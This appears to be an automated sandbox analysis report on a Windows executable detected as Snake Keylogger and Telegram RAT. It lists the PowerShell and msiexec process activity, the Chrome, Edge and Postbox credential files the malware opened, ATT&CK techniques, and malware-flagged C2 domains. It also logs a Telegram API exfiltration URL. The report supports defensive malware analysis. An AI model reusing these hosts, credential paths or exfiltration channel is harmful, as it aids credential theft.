          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00405BDF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BDF

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3504, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3504, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3504, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API          		Boot or Logon Initialization Scripts311
          Process Injection          		1
          Software Packing          		LSASS Memory14
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)Logon Script (Windows)1
          DLL Side-Loading          		Security Account Manager111
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
          Virtualization/Sandbox Evasion          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
          Process Injection          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586021 Sample: HVSU7GbA5N.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 4 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Antivirus detection for URL or domain 2->40 46 6 other signatures 2->46 8 HVSU7GbA5N.exe 1 22 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 process5 10 powershell.exe 29 8->10         started        file6 20 C:\Users\user\AppData\...\HVSU7GbA5N.exe, PE32 10->20 dropped 22 C:\Users\...\HVSU7GbA5N.exe:Zone.Identifier, ASCII 10->22 dropped 48 Early bird code injection technique detected 10->48 50 Writes to foreign memory regions 10->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 10->52 54 3 other signatures 10->54 14 msiexec.exe 15 8 10->14         started        18 conhost.exe 10->18         started        signatures7 process8 dnsIp9 30 checkip.dyndns.com 132.226.8.169, 49711, 49714, 49716 UTMEMUS United States 14->30 32 api.telegram.org 149.154.167.220, 443, 49728 TELEGRAMRU United Kingdom 14->32 34 3 other IPs or domains 14->34 56 Tries to steal Mail credentials (via file / registry access) 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 signatures10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HVSU7GbA5N.exe32%ReversingLabsWin32.Trojan.Leonem

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe32%ReversingLabsWin32.Trojan.Leonem

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.microsoft.csU0%Avira URL Cloudsafe
          http://varders.kozow.com:8081100%Avira URL Cloudmalware
          http://aborters.duckdns.org:8081100%Avira URL Cloudphishing
          http://crl.microsoft(0%Avira URL Cloudsafe
          http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		142.250.184.238
          		truefalse
            		high
            drive.usercontent.google.com
            		142.250.181.225
            		truefalse
              		high
              reallyfreegeoip.org
              		188.114.97.3
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		132.226.8.169
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        		high
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                          		high
                          http://checkip.dyndns.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.orgmsiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botmsiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.usercontent.google.com/#msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.csUpowershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.office.com/lBmsiexec.exe, 00000009.00000002.2665789154.000000002325A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://chrome.google.com/webstore?hl=enpmsiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000009.00000002.2665789154.000000002322E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://varders.kozow.com:8081msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://www.google.commsiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsoft(powershell.exe, 00000002.00000002.2010747235.0000000003408000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.office.com/pmsiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000009.00000002.2665789154.0000000023229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://apis.google.commsiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://reallyfreegeoip.org/xml/msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.office.com/msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://drive.usercontent.google.com/msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
